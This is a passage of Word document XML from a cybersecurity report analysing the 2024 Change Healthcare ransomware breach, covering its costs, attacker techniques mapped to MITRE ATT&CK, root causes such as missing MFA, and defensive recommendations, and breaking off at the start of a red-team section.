        <w:t>The financial toll is almost incomprehensible. Initial losses in Q1 2024 hit $872 million, but by year's end, the total had climbed to $2.87 billion [9]. That's billion with a "B." These costs include the ransom payment (reportedly $22 million to ALPHV), extensive forensic investigations, rebuilding compromised systems, regulatory fines, legal settlements, credit monitoring for nearly 200 million people, and the revenue lost during months of outages.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083712D" w:rsidRDefault="0083712D" w:rsidP="0083712D">
      <w:pPr>
        <w:pStyle w:val="font-claude-response-body"/>
      </w:pPr>
      <w:r>
        <w:t>But the numbers don't tell the whole story. Beyond the quantifiable financial damage lies something harder to measure: shattered trust. Patients wondering if their most intimate health information is floating around on the dark web. Healthcare providers questioning whether their vendors can be trusted. Regulators asking hard questions about how something like this could happen. And Congress, well, they called hearings and demanded answers [9].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083712D" w:rsidRDefault="0083712D" w:rsidP="0083712D">
      <w:pPr>
        <w:pStyle w:val="font-claude-response-body"/>
      </w:pPr>
      <w:r>
        <w:t>The breach affected an estimated 190 million individuals (later revised to 192.7 million), cementing its place as one of the largest healthcare data breaches in U.S. history [9]. For context, that's more people than voted in the 2020 presidential election. The ripple effects continue today through ongoing litigation, regulatory investigations, and fundamental questions about whether healthcare cybersecurity is adequate for the threats we face.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083712D" w:rsidRDefault="0083712D" w:rsidP="0083712D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>2.3 Attack Methodology and Tactics, Techniques, and Procedures (TTPs)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083712D" w:rsidRDefault="0083712D" w:rsidP="0083712D">
      <w:pPr>
        <w:pStyle w:val="font-claude-response-body"/>
      </w:pPr>
      <w:r>
        <w:t>The ALPHV/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BlackCat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> attack wasn't some smash-and-grab operation. It was methodical, sophisticated, and eerily professional</w:t>
      </w:r>
      <w:r w:rsidR="002008C5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>following a playbook that cybersecurity experts recognize from the MITRE ATT&amp;CK framework. Let's walk through how they did it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083712D" w:rsidRDefault="0083712D" w:rsidP="0083712D">
      <w:pPr>
        <w:pStyle w:val="font-claude-response-body"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>TTP 1: Resource Development</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Before the attack even began, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BlackCat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/ALPHV assembled their toolkit, including exploits for the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ConnectWise</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ScreenConnect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> vulnerability (CVE-2024-1709), custom ransomware payloads, and command-and-control servers [10]. Modern ransomware operations have become disturbingly professional, operating more like businesses than criminal enterprises. They have development teams, infrastructure, and operational procedures that would make some legitimate companies jealous.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083712D" w:rsidRDefault="0083712D" w:rsidP="0083712D">
      <w:pPr>
        <w:pStyle w:val="font-claude-response-body"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>TTP 2: Initial Access - Critical Vulnerability (T1078)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: The attackers exploited a zero-day vulnerability in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ConnectWise</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ScreenConnect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (CVE-2024-1709) [10], but the real breakthrough came from something much simpler: stolen credentials for that unprotected Citrix portal [6][7]. No MFA meant one compromised password gave them the keys to the kingdom. It's the cybersecurity equivalent of leaving your front door unlocked in a high-crime neighborhood.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083712D" w:rsidRDefault="0083712D" w:rsidP="0083712D">
      <w:pPr>
        <w:pStyle w:val="font-claude-response-body"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>TTP 3: Defense Evasion - Impair Defenses (T1562.001)</w:t>
      </w:r>
      <w:r>
        <w:t>: Once inside, the attackers worked carefully to avoid detection, encrypting their payloads and deleting logs [10]. Think of it like a burglar wearing gloves and wiping down surfaces; they knew exactly how to avoid leaving evidence that security systems could detect.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083712D" w:rsidRDefault="0083712D" w:rsidP="0083712D">
      <w:pPr>
        <w:pStyle w:val="font-claude-response-body"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>TTP 4: Credential Access - OS Credential Dumping (T1003)</w:t>
      </w:r>
      <w:r>
        <w:t>: The attackers didn't stop with their initial access. They used specialized tools to extract more credentials from compromised systems [10], think of it as stealing a keyring to get access to even more rooms in the building. Common techniques include raiding password storage, capturing credentials from memory, and exploiting cached login information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083712D" w:rsidRDefault="0083712D" w:rsidP="0083712D">
      <w:pPr>
        <w:pStyle w:val="font-claude-response-body"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>TTP 5: Discovery - Remote System &amp; Account Discovery (T1018, T1087.002)</w:t>
      </w:r>
      <w:r>
        <w:t>: For nine days, the attackers carefully mapped the network, identifying where the valuable data lived: domain controllers, database servers, backup systems [10]. This reconnaissance phase is critical for maximizing damage. They weren't randomly wandering; they were building a detailed map of their target.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083712D" w:rsidRDefault="0083712D" w:rsidP="0083712D">
      <w:pPr>
        <w:pStyle w:val="font-claude-response-body"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>TTP 6: Lateral Movement - RDP (T1021.001)</w:t>
      </w:r>
      <w:r>
        <w:t>: Using their stolen credentials, the attackers hopped from system to system, expanding their foothold [10]. The nine-day timeline shows they moved methodically and carefully, taking their time to avoid raising alarms while systematically compromising critical systems.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083712D" w:rsidRDefault="0083712D" w:rsidP="0083712D">
      <w:pPr>
        <w:pStyle w:val="font-claude-response-body"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>TTP 7: Collection - Data from Network Shares (T1039)</w:t>
      </w:r>
      <w:r>
        <w:t>: They gathered 6 TB of sensitive data: patient records, financial information, everything [10]. That's not something you do manually. They used automated tools to systematically vacuum up high-value information, carefully selecting what would be most damaging and valuable for extortion.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083712D" w:rsidRDefault="0083712D" w:rsidP="0083712D">
      <w:pPr>
        <w:pStyle w:val="font-claude-response-body"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>TTP 8: Command &amp; Control - Application Layer Protocol (T1071.001)</w:t>
      </w:r>
      <w:r>
        <w:t>: Throughout all this, they maintained encrypted communication channels back to their command-and-control servers [10]. By using standard protocols like HTTPS, their malicious traffic blended in with normal business communications, like having a secret conversation in a crowded room where everyone's talking.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083712D" w:rsidRDefault="0083712D" w:rsidP="0083712D">
      <w:pPr>
        <w:pStyle w:val="font-claude-response-body"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>TTP 9: Exfiltration - Exfiltration Over C2 Channel (T1567.002)</w:t>
      </w:r>
      <w:r>
        <w:t>: Over those nine days, 6 TB of data silently flowed out of Change Healthcare's network [10]. That's roughly equivalent to 1.5 million songs or 1,200 full-length movies. The fact that this went undetected represents a catastrophic failure of data loss prevention.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083712D" w:rsidRDefault="0083712D" w:rsidP="0083712D">
      <w:pPr>
        <w:pStyle w:val="font-claude-response-body"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>TTP 10: Impact - Data Encrypted for Impact (T1486)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Finally, they deployed their </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BlackCat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/ALPHV ransomware [10]. This isn't your average malware; it's written in Rust, a programming language that makes it fast, efficient, and capable of running across Windows, Linux, and virtualization platforms. When they flipped the switch, systems across Change Healthcare's infrastructure locked up simultaneously, bringing operations to a screeching halt and forcing the company into an impossible choice: pay up or face prolonged outages [10].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083712D" w:rsidRDefault="0083712D" w:rsidP="0083712D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.4 Root Cause Analysis and Systemic Failures</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083712D" w:rsidRDefault="0083712D" w:rsidP="0083712D">
      <w:pPr>
        <w:pStyle w:val="font-claude-response-body"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Here's the uncomfortable truth: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Change Healthcare breach wasn't the result of some unstoppable sophisticated attack. It was a convergence of basic security failures, architectural shortcomings, and organizational dysfunction. Let's break down what really went wrong.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083712D" w:rsidRDefault="0083712D" w:rsidP="0083712D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Primary Root Cause: Absence of Multi-Factor Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083712D" w:rsidRDefault="0083712D" w:rsidP="0083712D">
      <w:pPr>
        <w:pStyle w:val="font-claude-response-body"/>
      </w:pPr>
      <w:r>
        <w:t>The single most critical failure was absurdly simple: no MFA on the Citrix remote access gateway [7]. When UnitedHealth Group CEO Andrew Witty testified before the Senate Finance Committee in June 2024, he had to admit this embarrassing truth [11]. The attackers used stolen credentials to walk right in [7], and there was no second layer of defense to stop them [11].</w:t>
      </w:r>
      <w:r w:rsidR="002008C5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Here's what makes this so damning: every major cybersecurity framework (NIST, CISA, CIS Controls, PCI-DSS) explicitly requires MFA for remote access [</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>12][</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>13][14][15]. This isn't some obscure recommendation buried in fine print. It's Security 101. And the effectiveness isn't debatable: Microsoft's research analyzing hundreds of millions of login attempts shows MFA prevents approximately 99.9% of automated credential attacks [</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>17][</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>18][19]. That's not 90% or 95%. It's 99.9%.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Let's talk economics. Implementing MFA with hardware tokens would have cost somewhere between $150,000 and $300,000 [19]. The breach cost $2.87 billion. That's a prevention ROI exceeding 9,500 to 1. In other words, for every dollar spent on MFA, they would have saved</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>$9,500 in breach costs. This wasn't a resource problem; it was a priority problem, a leadership problem, and ultimately, a governance failure at the highest levels [</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>16][</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>5].</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>For an organization handling one-third of American patient records and processing billions in daily transactions, the decision not to implement this basic control is frankly inexcusable [</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>16][</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>5].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083712D" w:rsidRDefault="0083712D" w:rsidP="0083712D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Secondary Root Causes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083712D" w:rsidRDefault="0083712D" w:rsidP="0083712D">
      <w:pPr>
        <w:pStyle w:val="font-claude-response-body"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Inadequate Network Segmentation and Lack of Zero Trust Architecture</w:t>
      </w:r>
      <w:r>
        <w:t>: Once the attackers got in through that Citrix portal, they apparently hit very few roadblocks [20]. That nine-day lateral movement period tells us the network was likely designed with the outdated "castle-and-moat" mentality: hard exterior, soft interior. Once you're inside the castle walls, you can wander freely.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Modern security thinking has moved on. Zero trust architecture operates on the principle of "never trust, always verify" [21]. Every access request gets challenged, every user gets verified, and systems are segmented so that compromising one doesn't give you the run of the place [</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>20][</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>21]. Change Healthcare apparently didn't have these protections in place, allowing attackers to roam from the perimeter to domain controllers to data repositories with minimal friction.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083712D" w:rsidRDefault="0083712D" w:rsidP="0083712D">
      <w:pPr>
        <w:pStyle w:val="font-claude-response-body"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Deficient Threat Detection and Response Capabilities</w:t>
      </w:r>
      <w:r>
        <w:t>: Nine days. The attackers had nine days inside the network before anyone noticed. During that time, they should have tripped multiple alarms: unusual login patterns, credentials used from strange locations, abnormal data access, massive file transfers, suspicious PowerShell activity [22]. But nothing caught them.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Either Change Healthcare didn't have proper Security Information and Event Management (SIEM) systems, Endpoint Detection and Response (EDR) tools, and Network Traf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">fic Analysis (NTA) capabilities </w:t>
      </w:r>
      <w:r>
        <w:t>or they had them but they were poorly configured, understaffed, or generating so many false alarms that real threats got lost in the noise [</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>22][</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>23]. Modern detection platforms use machine learning to spot subtle anomalies in billions of security events [23], but you have to actually use them effectively.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>The most glaring failure: 6 TB of data flowing out over nine days without anyone noticing. That's not a subtle data leak; that's backing up a dump truck to your data warehouse and loading it up while everyone watches.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083712D" w:rsidRDefault="0083712D" w:rsidP="0083712D">
      <w:pPr>
        <w:pStyle w:val="font-claude-response-body"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Backup and Recovery Architecture Failures</w:t>
      </w:r>
      <w:r>
        <w:t>: The months-long recovery effort tells us something went seriously wrong with backups [24]. Best practices call for immutable, air-gapped backups stored separately with independent authentication [25]. The idea is that even if attackers trash your production systems, you've got clean copies they can't touch that let you rebuild within days, not months.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Organizations with proper backup architecture can typically restore operations within 24-72 hours without paying ransom, reducing breach costs by about 70% [</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>24][</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>25]. The extended Change Healthcare recovery timeline suggests their backups were either compromised (probably with those same stolen credentials), incomplete, or so entangled with production systems that they couldn't be quickly restored.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083712D" w:rsidRDefault="0083712D" w:rsidP="0083712D">
      <w:pPr>
        <w:pStyle w:val="font-claude-response-body"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Third-Party Risk Management and Supply Chain Security Deficiencies</w:t>
      </w:r>
      <w:r>
        <w:t>: Change Healthcare wasn't just another company; it was critical infrastructure for thousands of healthcare providers [26]. Yet the breach revealed serious gaps in cybersecurity due diligence, ongoing security monitoring, and contractual security requirements [26].</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>The 2022 acquisition that brought Change Healthcare under the UnitedHealth umbrella should have included thorough security assessments. Did anyone verify their cybersecurity posture? Were there requirements for minimum security standards? The breach suggests these either didn't happen or didn't go far enough [26]. And downstream, healthcare providers relying on Change Healthcare had little visibility into the vendor's security practices and no contractual leverage to demand better [27].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083712D" w:rsidRDefault="0083712D" w:rsidP="0083712D">
      <w:pPr>
        <w:pStyle w:val="font-claude-response-body"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Privileged Access Management (PAM) Gaps</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: The attackers escalated from regular user access to domain administrator privileges, then used those credentials to move laterally [28]. This points </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>to a lack of privil</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">eged access management controls </w:t>
      </w:r>
      <w:r>
        <w:t>things like just-in-time privilege elevation, time-bound administrative access, and session recording [29].</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Modern PAM solutions lock privileged credentials in encrypted vaults, require approval workflows for access, and automatically revoke privileges when tasks complete [</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>28][</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>29]. Without these controls, attackers can leverage compromised credentials across the entire environment, which is apparently what happened here.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083712D" w:rsidRDefault="0083712D" w:rsidP="0083712D">
      <w:pPr>
        <w:pStyle w:val="font-claude-response-body"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Incident Response Plan Inadequacies and Forensic Readiness Gaps</w:t>
      </w:r>
      <w:r>
        <w:t>: The breach happened February 21. The first notification went out July 19, nearly five months later [30]. The affected individual count kept changing: 500, then 100 million, then 190 million, finally 192.7 million. Initially, they even blamed it on a nation-state actor before identifying the actual perpetrators [30].</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>These aren't minor communication hiccups; they signal fundamental problems with incident response capabilities [31]. Effective incident response requires pre-written playbooks, relationships with forensic vendors, centralized logging for evidence collection, clear notification timelines, and regular practice exercises [31]. The confusion and delays suggest Change Healthcare either didn't have these basics or hadn't properly tested them [</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>30][</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>31].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083712D" w:rsidRDefault="0083712D" w:rsidP="0083712D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.5 Strategic Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083712D" w:rsidRDefault="0083712D" w:rsidP="0083712D">
      <w:pPr>
        <w:pStyle w:val="font-claude-response-body"/>
      </w:pPr>
      <w:r>
        <w:t>Based on everything we've learned, here are evidence-based recommendations that actually work:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083712D" w:rsidRDefault="0083712D" w:rsidP="0083712D">
      <w:pPr>
        <w:pStyle w:val="font-claude-response-body"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Phishing-Resistant MFA</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Deploy FIDO2 hardware tokens for all remote access [32]. Not SMS codes that can be intercepted. Not app-based codes that can be phished. Hardware tokens that provide cryptographic proof of identity that can't be faked or stolen remotely.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083712D" w:rsidRDefault="0083712D" w:rsidP="0083712D">
      <w:pPr>
        <w:pStyle w:val="font-claude-response-body"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Zero Trust Architecture</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Implement </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>microsegmentation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> that can reduce breach impact by about 80% [33]. Stop trusting people just because they're "inside" the network. Verify everything, segment everything, and limit the blast radius when breaches happen.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083712D" w:rsidRDefault="0083712D" w:rsidP="0083712D">
      <w:pPr>
        <w:pStyle w:val="font-claude-response-body"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Advanced EDR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Get endpoint detection and response platforms with behavioral analytics that can cut dwell time from about 21 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>days</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> industry-average down to 3 days [34]. The faster you detect intrusions, the less damage attackers can do.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083712D" w:rsidRDefault="0083712D" w:rsidP="0083712D">
      <w:pPr>
        <w:pStyle w:val="font-claude-response-body"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Immutable Backups</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Set up air-gapped, immutable backup infrastructure that reduces breach costs by approximately 70% and lets you recover without paying ransom [35]. Make sure attackers can't destroy your recovery options.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083712D" w:rsidRDefault="0083712D" w:rsidP="0083712D">
      <w:pPr>
        <w:pStyle w:val="font-claude-response-body"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>24/7 SOC</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Establish round-the-clock security monitoring that detects breaches up to 10 times faster than periodic security reviews [34]. Threats don't sleep, and neither should your defenses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083712D" w:rsidRDefault="0083712D" w:rsidP="0083712D">
      <w:pPr>
        <w:pStyle w:val="font-claude-response-body"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Data Loss Prevention (DLP)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t>Implement DLP solutions that reduce breach costs by around 38% by catching abnormal data movement [36]. If someone starts copying terabytes of sensitive data, you should know about it immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083712D" w:rsidRDefault="0083712D" w:rsidP="0083712D">
      <w:pPr>
        <w:pStyle w:val="font-claude-response-body"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Privileged Access Management (PAM)</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Deploy PAM solutions that reduce credential-based breaches by about 65% [37]. Eliminate persistent privileged accounts and make every elevated access request explicit, monitored, and time-limited.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083712D" w:rsidRDefault="0083712D" w:rsidP="0083712D">
      <w:pPr>
        <w:pStyle w:val="font-claude-response-body"/>
      </w:pPr>
      <w:r>
        <w:t>The Change Healthcare breach should serve as a wake-up call for the entire healthcare industry. This wasn't an unstoppable advanced persistent threat from a nation-state. It was a preventable disaster caused by fundamental security failures. The question now is whether the industry will learn from it, or whether we're doomed to repeat it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D2A05" w:rsidRPr="003D2A05" w:rsidRDefault="003D2A05" w:rsidP="003D2A05">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E61E6E" w:rsidRPr="00C57BFC" w:rsidRDefault="00E61E6E" w:rsidP="00E61E6E">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0033774F" w:rsidRPr="00C57BFC" w:rsidRDefault="00E61E6E" w:rsidP="00E61E6E">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F4E79" w:themeColor="accent1" w:themeShade="80"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:b/>
          <w:color w:val="1F4E79" w:themeColor="accent1" w:themeShade="80"/>
        </w:rPr>
        <w:t>3. TASK 2: RED TEAM ENGAGEMENT - OPERATION IP SHIELD</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.1 Rules of Engagement (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>RoE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
